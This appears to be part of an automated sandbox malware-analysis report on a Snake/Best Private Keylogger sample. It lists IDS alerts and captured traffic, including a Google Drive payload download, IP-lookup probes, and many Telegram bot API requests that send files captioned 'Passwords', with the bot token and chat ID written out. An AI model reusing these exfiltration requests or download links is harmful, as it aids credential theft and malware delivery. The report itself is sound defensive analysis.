              Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:50005 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:50062 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:50062 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:50054 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:50054 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:50058 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:50058 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:50072 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:50072 -> 149.154.167.220:443
              Source: unknownDNS query: name: api.telegram.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31dea4934fa5Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31f39219a5f5Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd320870af382eHost: api.telegram.orgContent-Length: 1090
              Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd321d4072b991Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32309fc74a6bHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3242917a2401Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd325897e9bff1Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd326bcf5d4f67Host: api.telegram.orgContent-Length: 1090
              Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd327c3cd25000Host: api.telegram.orgContent-Length: 1090
              Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd328f5a1d1c8dHost: api.telegram.orgContent-Length: 1090
              Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32a26a7e53b1Host: api.telegram.orgContent-Length: 1090
              Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32b6c93ca24dHost: api.telegram.orgContent-Length: 1090
              Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32c9bf1af266Host: api.telegram.orgContent-Length: 1090
              Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32db4edd8fcdHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32ef841d8f04Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33025319aa33Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33166bdcba3fHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd332920706cf4Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd333d1c059f2aHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd334e617abdefHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3360eddb09a8Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33721b5eeed7Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3385df447484Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33984405d90aHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33b5145197d2Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33cf2e35ee98Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33e3ffe66eb3Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33fb59f8d8edHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd341919464094Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd34357477f033Host: api.telegram.orgContent-Length: 1090
              Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd34663c8145e3Host: api.telegram.orgContent-Length: 1090
              Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd347fcfb3bfa5Host: api.telegram.orgContent-Length: 1090
              Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd34bcf6e6755fHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd35a148fe7d29Host: api.telegram.orgContent-Length: 1090
              Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
              Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
              Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: unknownDNS query: name: checkip.dyndns.org
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49754 -> 193.122.6.168:80
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49816 -> 193.122.6.168:80
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49736 -> 142.250.181.238:443
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1t40TkIMwnRUYXXqQGD85PlamUR-D2DEo HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /download?id=1t40TkIMwnRUYXXqQGD85PlamUR-D2DEo&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49765 version: TLS 1.0
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1t40TkIMwnRUYXXqQGD85PlamUR-D2DEo HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /download?id=1t40TkIMwnRUYXXqQGD85PlamUR-D2DEo&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
